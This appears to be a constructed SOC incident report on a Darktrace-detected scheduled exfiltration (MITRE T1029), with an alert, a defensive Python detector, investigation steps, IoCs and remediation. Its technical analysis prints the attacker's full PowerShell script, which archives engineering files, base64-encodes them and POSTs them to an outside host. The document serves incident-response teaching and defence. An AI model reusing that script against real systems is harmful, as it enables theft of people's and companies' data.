T1029 – Scheduled Transfer (Darktrace Detection)

Darktrace Alert Details
Alert ID: DARKTRACE-SCHEDULED-EXFIL-1029-7842
Alert Time: 2024-03-02 16:30:45 EST
Severity: HIGH (85/100)
Source: Darktrace Enterprise Immune System
Rule: “Regular Scheduled Data Transfer – Potential Exfiltration”
MITRE ATT&CK: T1029 – Scheduled Transfer

Alert Details:

Detection: Regular, scheduled data transfers to external IP every 24 hours

Source: 192.168.45.78 (ENG-WS-045 – Engineering)
Destination: 185.143.221[.]89:443
Pattern: Daily at 04:00 AM (off-hours)
Data Volume: 15-20 MB each transfer

Transfer History (from Darktrace model):

2024-02-28 04:00:15 – 16.2 MB transferred
2024-02-29 04:00:22 – 18.7 MB transferred
2024-03-01 04:00:18 – 15.9 MB transferred
2024-03-02 04:00:25 – 17.3 MB transferred (today)

Current Detection:

Time: 16:30 EST (alert based on pattern analysis)
Detected after 4 days of scheduled transfers

Scheduled Task Details (from EDR):

Task Name: “WindowsUpdateTask” (masquerading)
Trigger: Daily at 04:00 AM
Action: PowerShell script exfiltrating data

Detection Logic:

Regular transfers at same time daily (scheduled)
Off-hours execution (04:00 AM)
Consistent data volume (15-20 MB)
Destination IP known malicious
Pattern matches scheduled exfiltration
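The detection logic above, worked through as an added Python example (this is not Darktrace's own model): flow records are grouped by source and destination, and a pair is flagged only when all three stated criteria hold, namely a fixed daily cadence, off-hours start times and a consistent volume. The flow records are constructed to mirror the transfer history above, and the thresholds (10-minute jitter, 00:00-06:00 window, 25% size variation) are assumptions.

```python
from datetime import datetime
from statistics import mean, pstdev

# Constructed flow records (local time, src, dst:port, bytes) modelled on the
# alert's transfer history, plus a benign host with irregular daytime traffic.
FLOWS = [
    ("2024-02-28 04:00:15", "192.168.45.78", "185.143.221[.]89:443", 16_200_000),
    ("2024-02-29 04:00:22", "192.168.45.78", "185.143.221[.]89:443", 18_700_000),
    ("2024-03-01 04:00:18", "192.168.45.78", "185.143.221[.]89:443", 15_900_000),
    ("2024-03-02 04:00:25", "192.168.45.78", "185.143.221[.]89:443", 17_300_000),
    ("2024-02-28 09:12:03", "192.168.45.90", "40.97.128.10:443", 1_100_000),
    ("2024-02-28 14:47:41", "192.168.45.90", "40.97.128.10:443", 9_800_000),
    ("2024-03-01 11:05:09", "192.168.45.90", "40.97.128.10:443", 350_000),
]


def find_scheduled_transfers(flows, min_events=3, jitter_s=600,
                             offhours=(0, 6), max_size_cv=0.25):
    """Flag (src, dst) pairs whose outbound transfers look scheduled.

    Requires a fixed cadence (every inter-arrival gap within jitter_s of the
    pair's mean gap), every start hour inside [offhours[0], offhours[1]), and
    a consistent size (coefficient of variation below max_size_cv).
    """
    by_pair = {}
    for ts, src, dst, size in flows:
        when = datetime.strptime(ts, "%Y-%m-%d %H:%M:%S")
        by_pair.setdefault((src, dst), []).append((when, size))
    findings = []
    for (src, dst), events in by_pair.items():
        events.sort()
        if len(events) < min_events:
            continue
        gaps = [(b[0] - a[0]).total_seconds() for a, b in zip(events, events[1:])]
        period = mean(gaps)
        if any(abs(g - period) > jitter_s for g in gaps):
            continue  # irregular cadence: not a schedule
        if not all(offhours[0] <= t.hour < offhours[1] for t, _ in events):
            continue  # at least one transfer during business hours
        sizes = [s for _, s in events]
        if pstdev(sizes) / mean(sizes) > max_size_cv:
            continue  # volumes vary too much to be the same job
        findings.append({"src": src, "dst": dst, "events": len(events),
                         "period_h": round(period / 3600, 2),
                         "total_mb": round(sum(sizes) / 1e6, 1)})
    return findings
```

Run against FLOWS, only the ENG-WS-045 pair is returned: four events, a 24-hour period and 68.1 MB in total, while the daytime host is dropped at the cadence check.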

SOC Investigation Process

Step | Action | Tools Used | Findings
1. Alert Validation | Verify Darktrace alert | Darktrace Console | Confirmed scheduled exfiltration pattern
2. Process Investigation | Identify scheduled task | CrowdStrike Falcon | “WindowsUpdateTask” running PowerShell script
3. Script Analysis | Extract PowerShell script | CrowdStrike Live Response | Script collects and exfiltrates engineering data
4. Data Analysis | Determine what was stolen | File Audit Logs | ~68 MB total exfiltrated over 4 days
5. Immediate Action | Isolate host | CrowdStrike | ENG-WS-045 quarantined
6. Account Remediation | Disable rpatel account | Azure AD, AD | Account disabled; password reset

Jira Incident Report
Ticket: SOC-2024-159
Summary: T1029 – Scheduled Exfiltration of 68 MB Over 4 Days
Status: RESOLVED
Resolution: MALICIOUS – Data Breach Confirmed
Priority: P1 – CRITICAL
Labels: T1029, scheduled-transfer, exfiltration, darktrace, compromised-account
Components: Network-Security, Endpoint-Security

INCIDENT ANALYSIS REPORT

1. Initial Context:

Detection Source: Darktrace Enterprise Immune System.
Alert: “Regular Scheduled Data Transfer – Potential Exfiltration”.
Source: ENG-WS-045 (Engineering, user rpatel).
Destination: 185.143.221[.]89:443.
Pattern: Daily at 04:00 AM, 15-20 MB each.
Total: 68 MB over 4 days.
Time: 2024-03-02 16:30 EST.
Technique: MITRE ATT&CK T1029 – Scheduled Transfer.

2. Technical Analysis:

Attack Chain:

2024-02-28 – rpatel account compromised
2024-02-28 03:00 – Attacker creates scheduled task
2024-02-28 04:00 – First exfiltration (16.2 MB)
2024-02-29 04:00 – Second exfiltration (18.7 MB)
2024-03-01 04:00 – Third exfiltration (15.9 MB)
2024-03-02 04:00 – Fourth exfiltration (17.3 MB)
2024-03-02 16:30 – Darktrace detects pattern

Scheduled Task Details:

Name: WindowsUpdateTask (masquerading)
Trigger: Daily at 04:00 AM
Action: PowerShell script C:\Windows\Tasks\update.ps1
Run As: SYSTEM

PowerShell Script:

# Collection targets: the user's project files and the shared engineering store
$files = @(
    "C:\Users\rpatel\Documents\ProjectX\*.*",
    "C:\Users\rpatel\Desktop\*.docx",
    "C:\engineering_data\*.*"
)
# Stage everything in a single archive under the Windows temp directory
$zip = "C:\Windows\Temp\data.zip"
Compress-Archive -Path $files -DestinationPath $zip
# Base64-encode the archive and wrap it in a JSON body
$bytes = [System.IO.File]::ReadAllBytes($zip)
$b64 = [System.Convert]::ToBase64String($bytes)
$body = @{data=$b64} | ConvertTo-Json
# POST to the attacker host over HTTPS (IP defanged), then remove the staged archive
Invoke-WebRequest -Uri https://185.143.221[.]89/upload -Method POST -Body $body
Remove-Item $zip

Total Data Exfiltrated (68 MB):

ProjectX source code (28 MB)
Engineering designs (22 MB)
Project documentation (12 MB)
Personal notes (6 MB)

3. Investigation Findings:

Timeline:

02-28 03:00 – Task created
02-28 04:00 – Day 1 exfiltration
02-29 04:00 – Day 2 exfiltration
03-01 04:00 – Day 3 exfiltration
03-02 04:00 – Day 4 exfiltration
03-02 16:30 – Darktrace alert
03-02 16:32 – SOC investigates
03-02 16:33 – Host isolated
03-02 16:34 – Scheduled task disabled

Indicators of Compromise (IoCs):

Scheduled Task:
– “WindowsUpdateTask”
– Action: C:\Windows\Tasks\update.ps1

Files:
– C:\Windows\Tasks\update.ps1 (SHA256: a1b2c3d4…)

Network:
– Destination: 185.143.221[.]89:443
– Pattern: 15-20 MB daily at 04:00 AM

Account:
– rpatel (compromised)

4. Containment Actions:

Immediate Actions:

Isolated ENG-WS-045 via CrowdStrike.
Disabled scheduled task.
Deleted PowerShell script.
Blocked destination IP at firewall.
Disabled rpatel account.
Reset password.

Data Protection:

Determined scope of exfiltrated data (68 MB over 4 days).
Notified affected data owners.
Initiated breach response.

Host Remediation:

Reimaged host.

5. Root Cause Analysis:

Primary Cause: User account compromised, leading to scheduled exfiltration.
Contributing Factors:
No MFA on account.
RDP allowed from internet.
Scheduled task not monitored.
Off-hours transfers not detected for 4 days.

6. Business Impact:

Operational Impact: Engineering host offline.
Data Exposure: 68 MB of engineering IP exfiltrated over 4 days.
Financial Impact: Significant (IP theft, incident response).

7. Remediation & Prevention:

Completed Actions:

Scheduled exfiltration stopped.
Malware removed.
Account secured.

Technical Controls Enhanced:

Enforced MFA for all users.
Moved RDP behind VPN only.
Enhanced monitoring for scheduled tasks.
Created alert for off-hours data transfers.

8. Conclusion:

An attacker compromised an engineering account and created a scheduled task that exfiltrated 68 MB of intellectual property over 4 days, operating daily at 04:00 AM to evade detection. Darktrace detected the pattern after 4 days, enabling containment.

Closure Rationale: Data exfiltrated; exfiltration stopped; account secured; breach response initiated.

Analyst: [Your Name], SOC Analyst
Date: 2024-03-02 17:30 EST